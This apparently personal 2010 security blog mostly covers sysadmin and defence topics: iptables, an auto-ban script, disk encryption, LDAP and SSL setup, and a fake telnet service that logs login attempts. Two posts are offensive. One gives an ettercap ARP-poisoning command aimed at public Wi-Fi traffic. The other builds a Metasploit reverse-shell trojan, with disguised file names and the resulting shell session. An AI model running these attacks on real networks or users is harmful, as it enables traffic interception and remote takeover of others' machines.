Sunday, February 28, 2010

Basic Arp Poisoning with Ettercap

A simple one-liner in ettercap allows for the poisoning of a network to vastly improve the results gained in packet captures. This is a "noisy" method which will generate a large amount of traffic on a network and will be easily detected in any reasonably sophisticated infrastructure or by anyone running an IDS, however in small scale networks (a small business, coffee shop, public hotspot, etc.) it is unlikely to be noticed in the short run.

The quick and dirty:
root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //

This tells ettercap to use wireless interface 0, go into text mode, use quiet output, and start ARP poisoning with the local gateway (in this instance, 192.168.168.168) as the first target group and every other host (the empty //) as the second.

What ettercap will then do is send forged ARP replies in both directions: every other host on the network is told that the attacker's MAC address belongs to 192.168.168.168, and the gateway is told that the attacker's MAC belongs to each of those hosts. Since that address is the gateway, all traffic between the LAN and the internet, outbound and the replies coming back, now passes through the attacker's machine first, where it can be sniffed or manipulated at will. Ettercap forwards the intercepted packets itself, so the kernel's ip_forward should stay off; and quit it cleanly (q) so it can re-ARP the victims with the real addresses, otherwise the poisoned caches persist until they time out and the network stays broken.


As you can see, by firing up Wireshark with a display filter of 'http' we can see the web traffic of other machines on the network, this packet being a simple weather update request from a smartphone on the network.. but you get the idea, it will show the attacker anything that's in clear text.

For information on how to sniff encrypted connections, check out these posts:
SSL Man In The Middle with Ettercap

Friday, February 26, 2010

Active Apache Defense

Running a publicly accessible web server quickly makes one familiar with the onslaught of attempts to find vulnerable web applications on that site. Whether they are individual attackers, scripted scans, or just someone poking around, it's traffic you don't need from a source you want nothing to do with.. or rather, one you want to have nothing to do with your system.

This method, which was created with some collaboration with a peer of mine at school (who closed a huge security hole in it.. that whole escaping-shell-commands thing, pretty important), uses the Apache mod_rewrite engine and a PHP/shell script combo to dynamically add iptables rules when specified URLs are requested from your server. The vast majority of the time a potential attacker will be banned before they even realize what happened.

First, create the php script, this one is about three revisions of tweaking and seems to work quite effectively...

testBan.php:

<?php
// Log the requesting address, then hand it to ignore.sh for the firewall rule.
$banme = $_SERVER['REMOTE_ADDR'];

// Refuse anything that is not a plain IP address before it goes anywhere near a shell.
if (filter_var($banme, FILTER_VALIDATE_IP) === false) {
    exit;
}

$myFile = "ban.txt";
$fh = fopen($myFile, 'a') or die("Can't Open File");
fwrite($fh, $banme . "\n");
fclose($fh);

// escapeshellarg() quotes the value as one argument; that is the right call for
// an argument, escapeshellcmd() is meant for a whole command line.
$e = escapeshellarg($banme);
system("/var/www/localhost/htdocs/sec/ignore.sh $e");

echo "Security Violation: The IP Address $banme has been logged and added to the blacklist";
?>

The echo is really for debugging purposes; there is no real need to let someone know that they've been banned. Since the script, ban.txt and ignorefile all live under the document root here, make sure those two files are not served to the world (deny them in .htaccess or move them outside the web tree).


ignore.sh:
#!/bin/bash
# Usage: ignore.sh <ip>   (called by testBan.php with a validated, quoted address)
ip="$1"

# Already banned? -x matches the whole line, -F takes the address literally.
if grep -qxF -- "$ip" ignorefile 2>/dev/null; then
    exit 0
fi

sudo iptables -A INPUT -s "$ip" -j APACHE
echo "$ip" >> ignorefile
 
That iptables rule sends the traffic to a chain called APACHE (create it first with iptables -N APACHE); I like to direct it there for logging purposes, you could just as easily drop or reject the traffic outright. A few things to get right for this to actually work: the web server user needs a sudoers entry limited to that single iptables command with NOPASSWD; ignorefile is opened relative to whatever working directory Apache hands the script, so give it an absolute path; and -A appends the ban to the end of INPUT, which means an earlier rule that accepts port 80 will match first and the ban never fires. If your ruleset looks like that, insert with -I instead.
Next, create or add to a .htaccess file in your web root directory and create rewrite rules based on the kind of access attempts you notice to be common. Collecting a group of these common attempts is pretty easy, just grep your Apache access log for " 404 " and you will see large groups of attempts to find things like roundcube or phpmyadmin.

A basic mod_rewrite setup looks like this:

RewriteEngine On
RewriteRule ^phpmyadmin/ /sec/testBan.php [R=301,L]
RewriteRule ^roundcube/ /sec/testBan.php [R=301,L]
RewriteRule ^XMBforum/ /sec/testBan.php [R=301,L]
RewriteRule ^webmail/ /sec/testBan.php [R=301,L]


There are plenty of more complex regex-based rewrites you could use to trap even more attempts; these are just a simple example. Make sure none of your rewrites match a legitimate site URL or you'll end up blocking welcome traffic accidentally. Two more things to check before turning this on: if the server sits behind a reverse proxy or load balancer, REMOTE_ADDR is the proxy's address and the first trap hit bans it for everyone; and nothing on the site should link to a trap path, or a search-engine crawler or a browser's link prefetch will walk straight into it.
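To decide which paths deserve a RewriteRule, the access log has to be mined for repeated 404s. The functions below are an added example, not from the original post; they work on Apache's combined log format, and the log lines embedded here are constructed (RFC 5737 documentation addresses), not real traffic.

```bash
#!/bin/bash
# Added example: mine an Apache combined-format access log for the 404 probes
# that the rewrite rules above should trap. Sample lines are constructed.
SAMPLE_LOG='203.0.113.7 - - [26/Feb/2010:10:01:02 -0800] "GET /phpmyadmin/ HTTP/1.1" 404 512 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Feb/2010:10:01:03 -0800] "GET /pma/ HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.9 - - [26/Feb/2010:10:05:10 -0800] "GET /roundcube/ HTTP/1.1" 404 512 "-" "-"
192.0.2.44 - - [26/Feb/2010:10:06:00 -0800] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Feb/2010:10:07:00 -0800] "GET /webmail/ HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.9 - - [26/Feb/2010:10:09:00 -0800] "GET /phpmyadmin/ HTTP/1.1" 404 512 "-" "-"'

# In the combined format field 7 is the request path and field 9 the status code.
# Most-requested paths that returned 404, with hit counts: candidates for RewriteRule traps.
top_404_paths() {
    awk '$9 == 404 { print $7 }' | sort | uniq -c | sort -rn
}

# Addresses that produced at least $1 (default 2) 404s: candidates for a manual ban.
repeat_404_sources() {
    local min="${1:-2}"
    awk -v min="$min" '$9 == 404 { n[$1]++ } END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }'
}
```

Typical use is `top_404_paths < /var/log/apache2/access.log | head -20`; anything near the top that your site does not serve (and that a real user would never type) is a safe trap path.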

Ubuntu Full Disk Encryption

If you are installing ubuntu, you can setup Full Disk Encryption via an encrypted LVM as your root partition almost effortlessly. You just need to download the alternate disk rather than the normal live disk.

Example download file For 9.10 64bit:
http://ftp.ucsb.edu/pub/mirrors/linux/ubuntu/9.10/ubuntu-9.10-alternate-amd64.iso.torrent

When booted, this disk goes into the old text-mode installer rather than a live Ubuntu session, but during the partitioning stage there is a guided option that uses an encrypted LVM. After selecting and confirming that option it prompts for a passphrase... make it a good one, and one that you'll remember; it is the only thing standing between the disk and whoever picks up the machine.

Using this method it is not possible to boot the operating system or read anything on the root volume without the passphrase, and attacking the encryption itself rather than guessing the passphrase would be a monumental and expensive effort. Two limits worth knowing: /boot stays unencrypted (the kernel and initramfs have to be readable in order to ask for the passphrase), so someone with physical access can still tamper with it, and the protection only applies while the machine is powered off; a running or suspended system has the key in memory.

Wednesday, February 24, 2010

Passwords Across Services

When I first got a Gmail account I didn't take it too seriously, another random email, and so I set it up with a password that I commonly used as a "throwaway".. it was relatively weak and used on a few other sites, including ones that don't even bother with encryption; but again, why did I care? It's some junk email site...

Then I started using Google Docs, then Google Analytics, Google Checkout, Google AdSense, Blogger, and so on... the throwaway little junk email was suddenly responsible for a large portion of my online presence and tied to at least one credit card, and the other day I was logging into Gmail and realised what I was typing... a weak password, used on multiple sites, with high exposure.

Needless to say, I went and changed it to something much stronger. In fact I took the opportunity to change most of my passwords to stronger alternatives, making sure to separate the secure and insecure sites, and I encourage everyone else to as well.

Take a moment and think about how many sites you use the same password for, google especially, and if any of those sites have a login in cleartext.

It's amazing how these things can just sneak up on people.


P.S. for the unaware, a strong password is longer than 8 characters and mixes letters, numbers, and symbols, or is a sentence/phrase longer than 16 characters. Just as important, it is unique to the site: a password reused on a site that stores or sends it in the clear is only as strong as that site.

Sun LDAP Proxy

Since one of the LDAP proxy systems I work with decided to start having issues last week, today I took the time to go in and rebuild it... a pretty simple task in general, but again, nothing produced by Sun has straightforward instructions.. at least not until someone that actually uses their software writes them.

So with a little help from google, and a lot of references to help files, here is how to set up a Sun Directory Server Enterprise Edition proxy server that points to three back-end servers.

Jump into the DSEE dps6 toolbox, then create and start your proxy instance:
#cd /opt/SUNWdsee/dps6/bin
#./dpadm create /var/opt/SUNWdsee/ldap_proxy1
#./dpadm start /var/opt/SUNWdsee/ldap_proxy1/

Next we'll configure the instance with dpconf. If you get stuck, or need to know what else dpconf can do, the --help flag does at least provide a list of arguments:


#./dpconf --help

1. Create an ldap data source pool, you can then view it to make sure it was created.
#./dpconf create-ldap-data-source-pool ldap_pool
#./dpconf list-ldap-data-source-pools

2. Create your ldap data sources, you can name them whatever you want, I just used their hostnames, make sure the address of each is correct though.
#./dpconf create-ldap-data-source ldapserver1 ldapserver1.mydomain.org:389
#./dpconf create-ldap-data-source ldapserver2 ldapserver2.mydomain.org:389
#./dpconf create-ldap-data-source ldapserver3 ldapserver3.mydomain.org:389

3. Attach your data sources to the data pool, this can be done all in one command.
#./dpconf attach-ldap-data-source ldap_pool ldapserver1 ldapserver2 ldapserver3

4. Set the weights for each data source. With the pool's default proportional load-balancing algorithm, requests are distributed in proportion to the weights, so the values below send ldapserver1 and ldapserver2 twice as many requests as ldapserver3 rather than keeping ldapserver3 in reserve; if you want it used only when the other two are down, switch the pool's load-balancing-algorithm property to failover instead. Each of these is a single command line:
#./dpconf set-attached-ldap-data-source-prop ldap_pool ldapserver1 add-weight:10 bind-weight:10 compare-weight:10 delete-weight:10 modify-dn-weight:10 modify-weight:10 search-weight:10
#./dpconf set-attached-ldap-data-source-prop ldap_pool ldapserver2 add-weight:10 bind-weight:10 compare-weight:10 delete-weight:10 modify-dn-weight:10 modify-weight:10 search-weight:10
#./dpconf set-attached-ldap-data-source-prop ldap_pool ldapserver3 add-weight:5 bind-weight:5 compare-weight:5 delete-weight:5 modify-dn-weight:5 modify-weight:5 search-weight:5
 
5. Set the bind dn for each data source, this is usually "Directory Manager" if your back-end is the standard sun setup.
#./dpconf set-ldap-data-source-prop ldapserver1 bind-dn:"cn=Directory Manager"
#./dpconf set-ldap-data-source-prop ldapserver2 bind-dn:"cn=Directory Manager"
#./dpconf set-ldap-data-source-prop ldapserver3 bind-dn:"cn=Directory Manager"
 
6. Set up the bind password. You can't pass it as an argument by itself; you have to create a file containing the password and give that file to the set command. Create it readable only by you, and bear in mind that the echo below leaves the password in your shell history, so delete the file and that history entry once dpconf has read it.
#echo secretbindpassword > pass
#./dpconf set-ldap-data-source-prop ldapserver3 bind-pwd-file:pass
#./dpconf set-ldap-data-source-prop ldapserver2 bind-pwd-file:pass
#./dpconf set-ldap-data-source-prop ldapserver1 bind-pwd-file:pass

7. Finally, point your default proxy data view at your ldap data source pool, and then restart the proxy instance.
#./dpconf set-ldap-data-view-prop root\ data\ view ldap-data-source-pool:ldap_pool
#./dpadm stop /var/opt/SUNWdsee/ldap_proxy1/
#./dpadm start /var/opt/SUNWdsee/ldap_proxy1/
 
 
If all is well you should now be able to bind and query against the ldap proxy, which will load balance connections between the backend servers according to the weights you set.

Tuesday, February 23, 2010

Build Your Own Trojan, pt.1

I somehow missed this bit of Metasploit magic but recently have seen some examples of it floating around the web. Metasploit allows you to simply encode a payload into a binary (.exe), so that it runs in the event that you can get a victim to execute that binary.

My first shot at this was sort of a "hello world" in my own network just to see it work, so I built a reverse connect binary called exploitme.exe using the following command:

root@oblivion:/pentest/framework3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.168.13 LPORT=4444 X > exploitme.exe

That basically says "when someone runs exploitme.exe, connect back to 192.168.168.13 on port 4444 and serve up a shell as the user that executed it". The options are space-separated, and the trailing X asks msfpayload for a Windows executable (R would emit raw shellcode, which is not runnable on its own). I put that .exe on a local web server so I could grab it on a Windows box later.

Then on the attacker machine (.13) the same payload is handed to the generic handler, which just sort of hangs out and waits for the exploited machine to call home:

root@oblivion:/pentest/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.168.13 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:4444

So this, all by its self was way too easy... I hop on a windows7 machine and download exploitme.exe (of-course, if this were really an attempt to attack someone, better names include: setup.exe, crack.exe, avg_free.exe, limewirepro.exe, etc...). Anyway, once the executable is downloaded, and the user tries to run it, nothing seems to happen on their end (no real program is there in this version, just the exploit) and the waiting handler on the attackers machine is greeted with this:

[*] Starting the payload handler...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.168.13:4444 -> 192.168.168.24:51166)

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\Mozilla Firefox>

...awesome.

In the future I'll have a look at anti-virus evasion and more entertaining payloads than just a simple shell.

Monday, February 22, 2010

Sun Webserver7 - SSL

Dropping the following commands here so that I can reference them in the future, and since it was a pain in the ass to find the details in the first place maybe this will help someone else out too. As always with Sun software, I'm amazed that something this simple is also so arcane.

Preparing a signed certificate:

bash# /usr/sfw/bin/openssl pkcs12 -export -out mycert.pk12 -in mycert.cer -inkey mycert.key -name "sslcert"

(where mycert.cer is the signed cert from your authority, and mycert.key is the private key you generated the original request with. -export prompts for an export password, which pk12util asks for in the next step; -nodes is a parsing option and does nothing on export. If the CA handed you intermediate certificates, add them with -certfile so the chain ends up in the bundle and in the server's database too.)

Adding the certificate to the local database:

bash# pk12util -i mycert.pk12 -d /var/opt/SUNWwbsrv7/https-my-domain.com/config/.

Setting up the https listener with that cert:

bash# /opt/SUNWwbsrv7/bin/wadm --user=admin --port=8800 --no-ssl

wadm> pull-config --config=my-domain.com my-domain.com

wadm> create-http-listener --listener-port=443 --default-virtual-server-name=my-domain.com --config=my-domain.com

wadm> set-ssl-prop --config=my-domain.com --http-listener=http-listener-2 server-cert-nickname=sslcert enabled=true

wadm> deploy-config my-domain.com

victory
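The step that goes wrong most often is packaging a certificate with the wrong private key: pk12util will happily import the bundle and the listener will then fail at startup with nothing useful in the log. Below is an added example (not from the original post, and not specific to Sun Web Server) that compares the RSA modulus of the certificate and the key before building the PKCS#12 file; the file paths are arguments, and the bundle is created with a restrictive umask since it contains the private key.

```bash
#!/bin/bash
# Added example: confirm a signed certificate belongs to a private key, then
# build the PKCS#12 bundle only when it does.

# Print a fingerprint of the RSA modulus of a PEM certificate ("cert") or key ("key").
modulus_fp() {
    case "$1" in
        cert) openssl x509 -noout -modulus -in "$2" ;;
        key)  openssl rsa  -noout -modulus -in "$2" ;;
    esac | openssl sha256
}

# Exit 0 when certificate $1 and key $2 share a modulus, 1 when they do not,
# 2 when either file could not be read.
cert_matches_key() {
    local cfp kfp
    cfp=$(modulus_fp cert "$1") || return 2
    kfp=$(modulus_fp key "$2") || return 2
    [ "$cfp" = "$kfp" ]
}

# make_pkcs12 <cert> <key> <out.pk12> [nickname]: runs the check first.
# -export prompts for the bundle password; umask 077 keeps the file private.
make_pkcs12() {
    local cert="$1" key="$2" out="$3" nick="${4:-sslcert}"
    cert_matches_key "$cert" "$key" || { echo "certificate/key mismatch" >&2; return 1; }
    umask 077
    openssl pkcs12 -export -in "$cert" -inkey "$key" -name "$nick" -out "$out"
}
```

Usage: `make_pkcs12 mycert.cer mycert.key mycert.pk12 sslcert`, then the pk12util import as above. Delete the .pk12 file once it has been imported; the NSS database already holds the key.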

Sunday, February 21, 2010

Handy Iptables Rules

Given that iptables is the main interface for the netfilter firewall built into linux, knowledge of how to use it is one of the greatest assets that a sysadmin can have. The following is a list of common, and not so common, iptables rules that I have used in the past.


#allow all return traffic from outbound connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#never block localhost (match the loopback interface; a 127.0.0.1 source address can be spoofed on other interfaces)
iptables -A INPUT -i lo -j ACCEPT

#allow access to ssh from a specific network
iptables -A INPUT -s 192.168.100.0/24 -p tcp -m tcp --dport 22 -j ACCEPT

#block all other access to ssh
iptables -A INPUT -p tcp -m tcp --dport 22 -j REJECT

#quick rule to block a specific ip
iptables -A INPUT -s 192.168.0.13 -j DROP

#create a new iptables chain
iptables -N BLACKLIST

#set rules to log and then reject all traffic sent to a chain
iptables -A BLACKLIST -j LOG --log-prefix "[BLACKLISTED]: "

iptables -A BLACKLIST -j REJECT --reject-with icmp-host-prohibited

#send all traffic from a specific ip to a chain
iptables -A INPUT -s 192.168.0.99 -j BLACKLIST

#send all traffic to a specific port to a chain
iptables -A INPUT -p tcp -m tcp --dport 31337 -j BLACKLIST

#create a chain for ssh and send all new ssh sessions to it
iptables -N SSH_CHECK

iptables -A INPUT -p tcp -m tcp --dport 22 -m state --state NEW -j SSH_CHECK

#rate limit ssh to slow brute force attempts (the 4th or later new connection from one address within 60 seconds is dropped), and log any such events.
iptables -A SSH_CHECK -m recent --set --name SSH --rsource

iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j LOG --log-prefix "SSH Brute Force: "

iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j DROP

#a connection that survives SSH_CHECK returns to INPUT, so an ACCEPT for port 22 still has to follow the jump above or it falls through to whatever comes next

#Forward a port to another ip address using NAT (needs net.ipv4.ip_forward=1 and a FORWARD rule that accepts the traffic; the port stays 9001 unless --to-destination names another)
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 9001 -j DNAT --to-destination 192.168.0.100

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#Allow only a specific user to connect out to a certain port 
iptables -A OUTPUT -p tcp --dport 22 -m owner ! --uid-owner username -j REJECT

#Forbid a specific user from connecting out to a port
iptables -A OUTPUT -p tcp --dport 4444 -m owner --uid-owner root -j REJECT
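Individually these rules are fine; what bites people is the order they are loaded in, because the first matching rule wins. The script below is an added example, not from the original post, that assembles the INPUT-side rules above into one ordered set (loopback and established traffic first, the SSH rate limiter with the ACCEPT it needs behind it, a catch-all last). It defaults to a dry run that prints the iptables commands; 192.168.100.0/24 is the example management network from the rules above.

```bash
#!/bin/bash
# Added example: the rules above as one ordered ruleset.
# IPT defaults to a dry run that prints the commands; set IPT=iptables to apply.
IPT="${IPT:-echo iptables}"
ADMIN_NET="${ADMIN_NET:-192.168.100.0/24}"   # network allowed to reach ssh

build_ruleset() {
    # policies and a clean slate first; from here until the ESTABLISHED rule
    # lands, existing sessions only see a few retransmits
    $IPT -P INPUT DROP
    $IPT -P FORWARD DROP
    $IPT -P OUTPUT ACCEPT
    $IPT -F INPUT
    $IPT -F SSH_CHECK 2>/dev/null || true
    $IPT -X SSH_CHECK 2>/dev/null || true
    $IPT -N SSH_CHECK

    # 1. loopback, matched by interface rather than by a spoofable source address
    $IPT -A INPUT -i lo -j ACCEPT
    # 2. replies to connections we opened
    $IPT -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

    # 3. the ssh rate limiter: 4 or more new connections in 60 s from one source are logged and dropped
    $IPT -A SSH_CHECK -m recent --set --name SSH --rsource
    $IPT -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j LOG --log-prefix "SSH Brute Force: "
    $IPT -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j DROP
    # new ssh from the admin net goes through the limiter, and if it survives is accepted;
    # without the ACCEPT the RETURN from SSH_CHECK falls through to the reject below
    $IPT -A INPUT -s "$ADMIN_NET" -p tcp --dport 22 -m state --state NEW -j SSH_CHECK
    $IPT -A INPUT -s "$ADMIN_NET" -p tcp --dport 22 -m state --state NEW -j ACCEPT

    # 4. everything else is rejected explicitly so legitimate clients fail fast
    $IPT -A INPUT -p tcp --dport 22 -j REJECT
    $IPT -A INPUT -j REJECT --reject-with icmp-host-prohibited
}
```

Run `build_ruleset` once to read the dry-run output, then `IPT=iptables build_ruleset` to apply; add service rules (port 80 and the like) between steps 3 and 4.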

Saturday, February 20, 2010

Smoked Glass Rom

New release of Adamz's Smoked Glass ROM for the Motorola Droid came out yesterday, so of course I immediately re-flashed my phone (there goes that Linux OCD again..). This thing is fast, pretty, and powerful, and if you run a rooted Droid or are willing to take that plunge then I wholly suggest this ROM.

Smoked Glass v4.5

....
February 19, 2010
- Created custom kernel with 9 Processor Slots (More than enough to suit all needs)
- - 250, 400, 550, 600, 700, 800, 900, 1000, 1100 MHz Processor Slots
--- Processor Temperature Monitoring (Almost had it... but without sholes.info's repo I wouldn't have gotten what I was missing)
- - DMA Race Conditioning (thanks to sholes.info's great repo!)
--- Updates from 2.6.32 to fix Brightness and Touchscreen Issues (thanks to t3hSteve for posting the patch)
- - Nand Prefetch
- - Wi-Fi Tether

- Fixed Lockscreen Images in Landscape (I have NO idea how I did that...)
- Added xeudoxus' Launcher2.apk with fixed homescreen position.
- Removed Links for Extra Overclocking and Extra Overclocking Instructions
....


A note on rooting / flashing ROMs: everyone always gives the warning that it's potentially dangerous, it could brick your phone, things may not work right, etc. However I've yet to find anyone who, following proper backup/restore procedures, has had any problems that weren't immediately fixable.

That being said, I of course am not liable for you messing up your phone just because I endorse this awesome software.

Friday, February 19, 2010

transfering files to android

Yet another use for netcat...

Not having an FTP server handy and wanting to transfer a new ROM to my Droid, I tried to find the simplest method possible without the nuisance of plugging in the USB... maybe I'm just obsessed with netcat lately. This should work on any rooted Android device with busybox installed.

server (192.168.168.13):
$cat new_rom.zip | nc -l -p 8080

droid (on the 192.168.168.0/24 wireless):
$ su
#cd /sdcard
#busybox nc 192.168.168.13 8080 > new_rom.zip

Netcat does nothing to protect the transfer, so before flashing compare md5sum new_rom.zip on both ends (busybox has md5sum too); a truncated or tampered ROM is exactly what you don't want to flash.

Thursday, February 18, 2010

Instant Messengers and Encryption

Instant messaging services are remarkably still common for average net users to employ on a daily basis, however many (perhaps the majority) don't realize that on most networks every message they send is in clear-text and can be read by anyone else on their local network (like some creepy guy in Starbucks, or a hacker on your campus wireless).

Both AIM and GoogleTalk have an SSL option, why it's not enabled by default is something I don't quite grasp.. but you should be able to turn it on in your client. I happen to use pidgin, so for me the SSL options look like this.

As long as you have "use SSL" or "Require SSL" then your logins and communications should be safe from casual eavesdroppers.

As for msn/hotmail, their IM appears to send login credentials over a TLS encrypted connection.. so at least no one can sniff your username/password and get into your account, but after that it drops to a normal plain-text connection and all of your messages can be sniffed.

Facebook's new XMPP service is the worst of the lot, it expressly advertises that it doesnt in any way support encryption, advising users to uncheck the ssl option for XMPP. This makes using a facebook chat in a public location extremely vulnerable.

The only option for securing MSN or Facebook XMPP is to set up a SOCKS5 tunnel and point those messenger accounts at it; this can be done using an SSH tunnel if you have a public-facing Unix system available to you (ssh -D1234 username@fqdn). Keep in mind what that buys you: the messages are encrypted between your laptop and the SSH server, which is enough to beat the eavesdropper in the coffee shop, but they still leave the SSH server in clear text on their way to the IM service.

If you use the IM client Pidgin, there are some awesome encryption plugins. Check out "Pidgin Encryption" and "OTR Messaging". Both require that each party in the conversation have the plugin installed, but then the messages are encrypted end to end, unreadable even to the service provider; OTR also lets you verify who is on the other end and gives forward secrecy, neither of which the transport-level SSL options above provide.

cryptcat

Just noticed this in backtrack4, cryptcat is just like netcat only creates encrypted connections instead. The only downside is that you need cryptcat on both ends of the connection.

Make sure to use the -k flag to set your own key; otherwise it falls back to a hardcoded default key that anyone with a copy of cryptcat knows.. which kinda defeats the point. Two further caveats: the key shows up in ps output and shell history on both machines, and a shared key gives you confidentiality only, not authentication, so it does nothing to stop someone who has obtained the key from connecting.

server (1.2.3.4):
cryptcat -k mykey -l -p 4444 

client:
cryptcat -k mykey 1.2.3.4 4444



win!

Tuesday, February 16, 2010

Hackers still target telnet

Anyone that runs a server with a public IP address is familiar with the constant onslaught of various attacks, most of which are against some means of authentication in order to gain access to the system. This means we see a lot of access attempts to ssh, rdp, smtp, and.. telnet? Yes, way too many systems out there still run telnet, so it's a perfectly valid target for hackers.

How bland though, and such a waste of bits; they either never find a socket.. and die.. hit the firewall and die.. or trigger an IDS and die. At least with ssh or rdp there may be legitimate services at risk that I'm protecting, but telnet simply isn't there in any environment I run... or is it?

New idea.. make badguys think they've got a live telnet target to attack, while at the same time seeing what's currently in vogue for brute force username/password attempts. Pull out your trusty netcat and a short script for this one, we'll build a dummy telnet service that simply logs all access attempts.

#vi /scripts/my_telnet.sh
   #!/bin/bash
   # Fake telnet login: prompt, record whatever is typed, never let anyone in.
   printf 'username: '
   read -r a
   printf 'password: '
   read -r b
   printf 'username: %s\npassword: %s\n' "$a" "$b" >> /scripts/attempts.txt
   echo "Login incorrect"

Make the script executable, then loop the listener:

#while true; do nc -l -p 23 -e /scripts/my_telnet.sh; done

A few notes: -e only exists in netcats built with it (traditional netcat's GAPING_SECURITY_HOLE build, or ncat's --exec), and since the script writes the log itself there is no need to redirect nc's output as well. Real telnet clients open with option-negotiation bytes (0xff followed by 0xfb..0xfe), so expect the first logged "username" to carry a few bytes of binary junk in front of it. Binding port 23 needs root; the safer arrangement is to run the listener as an unprivileged user on a high port and redirect 23 to it with a nat-table REDIRECT rule.


Just another fun thing to play with on a non-production box.
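The point of the exercise was to see which usernames and passwords are in vogue, so the attempts file needs summarizing, and the telnet negotiation bytes need stripping first or the first username of every session is counted as garbage. The functions below are an added example, not part of the original post; the attempts.txt content is constructed here (with a negotiation blob on the first entry) and is not real captured data.

```bash
#!/bin/bash
# Added example: summarize what the fake telnet service collected.
# Constructed sample of attempts.txt; the first username carries telnet
# negotiation bytes (IAC DO ECHO = 0xff 0xfd 0x01) the way a real client sends them.
SAMPLE_ATTEMPTS=$(printf 'username: \377\375\001root\npassword: 123456\nusername: root\npassword: password\nusername: admin\npassword: admin\nusername: root\npassword: 123456\n')

# Drop telnet negotiation bytes and any other non-printable characters, leaving plain ASCII.
strip_telnet_iac() {
    LC_ALL=C tr -cd '\11\12\15\40-\176'
}

# Most common values for one field: top_field username  or  top_field password
# Output lines are "<count> <value>", most frequent first.
top_field() {
    strip_telnet_iac | awk -v f="$1:" '$1 == f { print $2 }' | sort | uniq -c | sort -rn
}

# Most common username/password pairs as "<count> <user> <pass>", most frequent first.
top_pairs() {
    strip_telnet_iac | awk '$1 == "username:" { u = $2 } $1 == "password:" { print u, $2 }' \
        | sort | uniq -c | sort -rn
}
```

Usage: `top_pairs < /scripts/attempts.txt | head`, or `top_field password < /scripts/attempts.txt` for a quick list of what not to use anywhere.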

Monday, February 15, 2010

nonsense, at least once a week

Today's project was to build a VPN and see what I could do with it... now note, as someone pursuing a degree in the computer field, no class I'm required to take has ever touched the concept of encrypted communications or secure networks... food for thought and an issue I'm still trying to find a way to solve.. not really for myself, it's a bit late, but for future students.
Anyway, personal interest and study led me to researching the topic. I started with studying SSH tunnels, using them as SOCKS5 proxies or for port forwarding; and then today finally tackling the whole VPN issue. Setting up a VPN server in Linux was remarkably simple, much less intimidating than I had imagined.. and now I'm looking into possible uses for such a network, just for fun.
http://en.gentoo-wiki.com/wiki/OpenVPN
...
meanwhile, Apple is persecuting anyone that tries to hack their iPhone firmware by cutting their access to Apple-run services.. jailbreaking your iPhone gets you on Jobs' naughty list. I've been playing more with DroidRootPro and the flashing of hacked ROMs to my Droid. If you own a device, you should be able to do anything you want with it.. Apple, you used to be cool..
http://www.androidzoom.com/android_applications/tools/droidrootpro_bqal.html
...
My home surveillance system is now finalized and Ive found that unless you're paying for an IR system or something seriously fancy, a basic camera set-up shouldnt cost more than 50 bucks... webcams and motion detection software go a long long way (particularly with motion triggered lighting outside).
....
Small plug for the playstation media server (PMS.. yeah..), streaming media off of any system to your ps3 is fairly awesome. Its java based so its operating system independent, as long as you have the codec support for ffmpeg and mencoder.
http://ps3mediaserver.blogspot.com/

Friday, February 12, 2010

wicd triggered ssh tunnels

I noticed something spiffy about the wicd network manager today, it has a section that allows you to trigger scripts at certain points of the connection process.. specifically interesting to me were post-connect and post-disconnect.

For a long time I've been trying to tell people that if at all possible they should tunnel their wireless traffic through an ssh connection whenever possible if they are on a public or insecure wifi. The problem with this is twofold, the first is that not everyone has access to a machine that they can use as an ssh tunnel exit point, and the second is that they have to open a terminal and manually set up the connection.. anything that takes effort like that, people are likely to forget or not bother with. I cant help people who have no publicly accessible Unix shell, but for those that do we can make having an available ssh tunnel a constant option.

So! enter wicd and its automatic script launching on connect... we'll set up a public key authorization login on the ssh server, write a tunnel script that will run in the background, and simply tell wicd that any-time we connect to the wireless to run the script.


For those unfamiliar with Public Key Authentication:
it is an SSH authentication method that uses a generated RSA key pair rather than a password: the public half goes on the server, the private half stays on your laptop, effectively creating a trust between the account on your laptop and the account on the server (never do this with root, and for this you don't even need an account that has sudo access). Since the script below has to run unattended, the private key will have no passphrase, so treat the laptop's ~/.ssh like the password it replaces and use a dedicated, unprivileged account on the server.



On your client machine (your laptop), run the following
   $ssh-keygen -q -t rsa -b 2048 -f ~/.ssh/id_rsa
   $chmod 700 ~/.ssh
   $scp ~/.ssh/id_rsa.pub my.sshserver.org:

On the server account run these (appending rather than moving, so any keys already in authorized_keys survive)
   $mkdir -p ~/.ssh
   $cat id_rsa.pub >> ~/.ssh/authorized_keys
   $chmod 700 ~/.ssh
   $chmod 600 ~/.ssh/authorized_keys

Finally, back on the client side open an ssh connection as follows:
   $ssh -o PreferredAuthentications=publickey my.sshserver.org


As for the ssh connection script..
I like to have a /scripts folder where i drop any tools i make myself, especially oneliners like this, so i recommend making a new file in /scripts called ssh_tunnel.sh, which will consist of two whole lines.

   $vim ssh_tunnel.sh

   #!/bin/bash
   ssh -f -N -D 127.0.0.1:9999 -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 -i /home/username/.ssh/id_rsa username@my.sshserver.org

